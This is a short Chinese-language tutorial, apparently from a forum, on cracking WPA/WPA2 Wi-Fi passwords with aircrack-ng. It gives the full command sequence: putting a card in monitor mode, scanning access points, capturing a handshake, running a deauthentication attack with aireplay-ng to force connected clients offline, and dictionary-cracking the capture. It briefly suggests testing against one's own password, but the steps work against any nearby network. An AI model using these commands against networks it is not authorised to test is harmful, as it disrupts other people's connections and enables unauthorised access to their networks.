在网上查找一番得知aircrack-ng这个软件,用这个软件最好是在linux,成功率也高,没有装linux的可以下载backtrack或者kali之类的LIVECD刻盘或者写入启动U盘。

下面开始进入正题:
11111    打开一个终端,切换到root用户,先用

複製代碼

ifconfig

查看下无线网卡,一般是wlan0 wlan1这样的名字
然后执行这条命令进入网卡的监听模式

複製代碼

airmon-ng start wlan0

我的电脑执行这条命令后wlan0网卡变成了wlan0mon。
22222    执行以下命令扫描AP

複製代碼

airodump-ng wlan0mon

然后你会看到类似下面的内容

複製代碼

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

选一个PWR绝对值小一点的,记下BSSID和CH
33333    执行以下命令收集WPA/WPA2握手包

複製代碼

airodump-ng -w /tmp/wpatest -c 11 --bssid 00:E0:4C:81:96:D1 wlan0mon

-c 后面的11就是CH
--bssid后面的是BSSID
执行这条命令后注意看第一行的右边

複製代碼

CH  11 ][ Elapsed: 1 min ][ 2015-01-21 04:00 ][ WPA handshake:

刚执行的时候你是看不到WPA handshake这两个单词的,这两个单词代表你已经抓到WPA/WPA2握手包了
要怎么抓到这个握手包呢?一种办法是等,等人联这个AP的时候就能抓到,或者攻击在线的客户端让它掉线重联。
开另一个终端用下面这条命令攻击

複製代碼

aireplay-ng -0 10 -a AP's MAC  wlan0mon

-a后面跟BSSID
如果有客户端在线一般攻击一两次就能抓到WPA包
44444    抓到WPA包之后用这条命令破解

複製代碼

aircrack-ng -w password.lst /tmp/wpatest*.cap

password.lst就是密码字典,就是一个文本文件,里面一行一条密码,各位可以自己随便建一个文件把自己的WIFI密码放进去,然后随便編几个密码测试能不能破解,一般就是几秒的事。
执行这条命令之后看中间Current passphrase的位置,破解成功会有KEY FOUND 然后后面跟着破解出来的密码。